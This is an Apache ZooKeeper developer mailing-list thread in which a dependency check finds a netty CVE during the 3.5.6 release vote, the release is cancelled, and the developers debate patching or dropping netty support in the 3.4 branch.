zookeeper-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Patrick Hunt <ph...@apache.org>
Subject Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2
Date Wed, 02 Oct 2019 15:47:54 GMT
On Wed, Oct 2, 2019 at 1:49 AM Andor Molnar <andor@apache.org> wrote:

> Hi Pat,
>
> Would you please clarify what do you mean “dropping netty support from
> 3.4”?
>
>
My simplistic thought was just that. Ship new versions of 3.4 that remove
support for netty. That could mean turning if off by default (not sure how
much work that would be) or just purging the netty code from the codebase
entirely. (3.4). It would be an exception to our "don't break b/w compact
in fix releases" policy, but this is an extreme case imo. We have no
intention of supporting netty in 3.4 going forward as evidenced by the fact
that the netty version is locked to netty 3 (long out of support by netty
as they are no longer backporting fixes) and we have no intention of
updating to the new version of netty on 3.4. Maybe this CVE don't affect
us, but at some point it will. Users have the option to move to a stable,
b/w compat, 3.5. release. Not optimal I agree.


> Does that mean we won’t submit security patches from now on, but keep the
> Netty classes (NettyServerCnxnFactory and ClientCnxnSocketNetty) available
> OR remove these classes from the codebase?
>
> The latter means we’ll drop client SSL feature too.
>
>
Say there is a new CVE on netty and it's not backported to netty3, what
would we do in that case. I guess we could wait/kick the can down the road
till we really hit that. For the moment just say that it doesn't affect us
as you researched and add to 3.4 exceptions.

This is just my suggestion/option rather than a recommendation, open to
other ideas. ;-)

Patrick


> Andor
>
>
>
> > On 2019. Oct 2., at 2:27, Michael Han <hanm@apache.org> wrote:
> >
> >>> How about officially dropping netty support from 3.4 and asking people
> > to move to the new version
> > +1. This sounds a good opportunity to deprecate 3.4 branch.
> >
> > On Tue, Oct 1, 2019 at 8:00 AM Enrico Olivelli <eolivelli@gmail.com>
> wrote:
> >
> >> Il giorno mar 1 ott 2019 alle ore 16:15 Patrick Hunt <phunt@apache.org>
> ha
> >> scritto:
> >>
> >>> Another option/solution: How about officially dropping netty support
> from
> >>> 3.4 and asking people to move to the new version (3.5 stable or later)?
> >>>
> >>
> >> Sounds good
> >>
> >> Enrico
> >>
> >>
> >>>
> >>> Patrick
> >>>
> >>> On Tue, Oct 1, 2019 at 4:22 AM Andor Molnar <andor@apache.org> wrote:
> >>>
> >>>> I agree with 3.4 should not be refactored in any way even for a
> >> security
> >>>> fix.
> >>>>
> >>>> What's wrong with the "alpha story"?
> >>>>
> >>>> I think releasing in an early stage with "-alpha", "-beta" modifiers
> is
> >>>> not a bad thing alone, as long as it doesn't take years to get to the
> >>>> stable release.
> >>>>
> >>>> Andor
> >>>>
> >>>>
> >>>> On Tue, 1 Oct 2019, Enrico Olivelli wrote:
> >>>>
> >>>>> Date: Tue, 1 Oct 2019 10:54:24 +0200
> >>>>> From: Enrico Olivelli <eolivelli@gmail.com>
> >>>>> Reply-To: dev@zookeeper.apache.org
> >>>>> To: dev@zookeeper.apache.org
> >>>>> Subject: Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2
> >>>>>
> >>>>> Il mar 1 ott 2019, 10:38 Andor Molnar <andor@apache.org> ha
scritto:
> >>>>>
> >>>>>> Backporting Netty 4 would be a huge, cumbersome task, I hope
we
> >> don’t
> >>>> have
> >>>>>> to do it.
> >>>>>>
> >>>>>
> >>>>> Yes, 3.4 is mature and stable and closed for refactors.
> >>>>>
> >>>>>
> >>>>>> However I had a quick look at the details of this CVE and it
seems
> >> to
> >>> me
> >>>>>> that it only affects the HTTP codec:
> >>>>>>
> >>>>>>
> >>>>
> >>>
> >>
> https://github.com/netty/netty/commit/39cafcb05c99f2aa9fce7e6597664c9ed6a63a95
> >>>>>>
> >>>>>> Can’t we just say 3.4.14 is not affected?
> >>>>>> We’re not running HTTP server inside ZooKeeper.
> >>>>>>
> >>>>>> Otherwise we might be able to release 3.6.0-alpha1 now, put
a date
> >> for
> >>>> 3.4
> >>>>>> EOL and highlight on the webpage that this
> >>>>>>
> >>>>>
> >>>>> Please do not start an 'alpha' story like for 3.5....
> >>>>>
> >>>>> CVE probably won’t be resolved on that branch, please upgrade
to 3.5.
> >>>>>>
> >>>>>
> >>>>> +1
> >>>>>
> >>>>>
> >>>>> Enrico
> >>>>>
> >>>>>>
> >>>>>> As a third option we could ask Norman to kindly fix 3.10.6.Final
as
> >>>> well…
> >>>>>> or submit a PR ourselves, it doesn’t seem to me a big deal.
> >>>>>>
> >>>>>
> >>>>> Not so useful
> >>>>>
> >>>>>>
> >>>>>> What do you think?
> >>>>>>
> >>>>>> Andor
> >>>>>>
> >>>>>>
> >>>>>>
> >>>>>>
> >>>>>>> On 2019. Oct 1., at 2:00, Patrick Hunt <phunt@apache.org>
wrote:
> >>>>>>>
> >>>>>>> I pushed patches for 3.5 and trunk and the tests passed
on my mac.
> >>>>>> However
> >>>>>>> 3.4 is using netty 3.10.6.Final and as such it's not a simple
> >>> upgrade.
> >>>>>>> (there are no fixes against 3.10 for this CVE, at least
not so far)
> >>> Not
> >>>>>>> sure what we want to do about this... someone would need
to
> >> backport
> >>>> the
> >>>>>>> netty 4.1 changes into 3.4 afaict.
> >>>>>>>
> >>>>>>> Patrick
> >>>>>>>
> >>>>>>> On Mon, Sep 30, 2019 at 1:08 PM Patrick Hunt <phunt@apache.org>
> >>> wrote:
> >>>>>>>
> >>>>>>>> I'll work on it today.
> >>>>>>>>
> >>>>>>>> Patrick
> >>>>>>>>
> >>>>>>>> On Mon, Sep 30, 2019 at 11:59 AM Enrico Olivelli <
> >>> eolivelli@gmail.com
> >>>>>
> >>>>>>>> wrote:
> >>>>>>>>
> >>>>>>>>> Okay
> >>>>>>>>>
> >>>>>>>>> I am cancelling the release.
> >>>>>>>>>
> >>>>>>>>> I have a problem with my box, I can't work on netty
upgrade.
> >>>>>>>>>
> >>>>>>>>> Any volounteer?
> >>>>>>>>>
> >>>>>>>>> Enrico
> >>>>>>>>>
> >>>>>>>>> Il lun 30 set 2019, 20:32 Andor Molnar <andor@apache.org>
ha
> >>>> scritto:
> >>>>>>>>>
> >>>>>>>>>> The good news is: we need to release 3.4.15
too. :)
> >>>>>>>>>>
> >>>>>>>>>> Andor
> >>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>>> On 2019. Sep 30., at 20:26, Patrick Hunt
<phunt@apache.org>
> >>> wrote:
> >>>>>>>>>>>
> >>>>>>>>>>> created: https://issues.apache.org/jira/browse/ZOOKEEPER-3563
> >>>>>>>>>>>
> >>>>>>>>>>> On Mon, Sep 30, 2019 at 11:20 AM Patrick
Hunt <
> >> phunt@apache.org>
> >>>>>>>>> wrote:
> >>>>>>>>>>>
> >>>>>>>>>>>> -1 - when I run dependency check on
the release candidate
> >>> artifact
> >>>>>>>>> it's
> >>>>>>>>>>>> failing with:
> >>>>>>>>>>>>
> >>>>>>>>>>>> [ERROR] netty-transport-4.1.29.Final.jar:
CVE-2019-16869
> >>>>>>>>>>>>
> >>>>>>>>>>>> I ran this on trunk and it's passing,
as such it must be an
> >>> issue
> >>>>>>>>> with
> >>>>>>>>>> the
> >>>>>>>>>>>> the 3.5.6 netty version specifically.
It's listed as a high,
> >> we
> >>>>>>>>> should
> >>>>>>>>>>>> patch this as well before releasing.
> >>>>>>>>>>>>
> >>>>>>>>>>>> Patrick
> >>>>>>>>>>>>
> >>>>>>>>>>>>
> >>>>>>>>>>>> On Sun, Sep 29, 2019 at 7:29 AM Enrico
Olivelli <
> >>>>>> eolivelli@gmail.com
> >>>>>>>>>>
> >>>>>>>>>>>> wrote:
> >>>>>>>>>>>>
> >>>>>>>>>>>>> This is a bugfix release candidate
for 3.5.6.
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> It fixes 28 issues, including upgrade
of third party
> >> libraries,
> >>>>>>>>>>>>> TTL Node APIs for C API, support
for PCKS12 Keystores, and
> >>> better
> >>>>>>>>>>>>> procedure
> >>>>>>>>>>>>> for the upgrade of servers from
3.4 to 3.5.
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> The full release notes is available
at:
> >>>>>>>>>>>>>
> >>>>>>>>>>>>>
> >>>>>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>
> >>>>>>
> >>>>
> >>>
> >>
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12310801&version=12345243
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> *** Please download, test and vote
by October 2nd 2019, 23:59
> >>>>>> UTC+0.
> >>>>>>>>>> ***
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> Source files:
> >>>>>>>>>>>>>
> >>> https://people.apache.org/~eolivelli/zookeeper-3.5.6-candidate-2
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> Maven staging repo:
> >>>>>>>>>>>>>
> >>>>>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>
> >>>>>>
> >>>>
> >>>
> >>
> https://repository.apache.org/content/repositories/orgapachezookeeper-1042/
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> The release candidate tag in git
to be voted upon:
> >>>>>> release-3.5.6-rc2
> >>>>>>>>>>>>> https://github.com/apache/zookeeper/tree/release-3.5.6-rc2
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> ZooKeeper's KEYS file containing
PGP keys we use to sign the
> >>>>>>>>> release:
> >>>>>>>>>>>>> https://www.apache.org/dist/zookeeper/KEYS
> >>>>>>>>>>>>>
> >>>>>>>>>>>>> Should we release this candidate?
> >>>>>>>>>>>>> Enrico Olivelli
> >>>>>>>>>>>>>
> >>>>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>>
> >>>>>>>>>
> >>>>>>>>
> >>>>>>
> >>>>>>
> >>>>>
> >>>
> >>
>
>

Mime
  • Unnamed multipart/alternative (inline, None, 0 bytes)
View raw message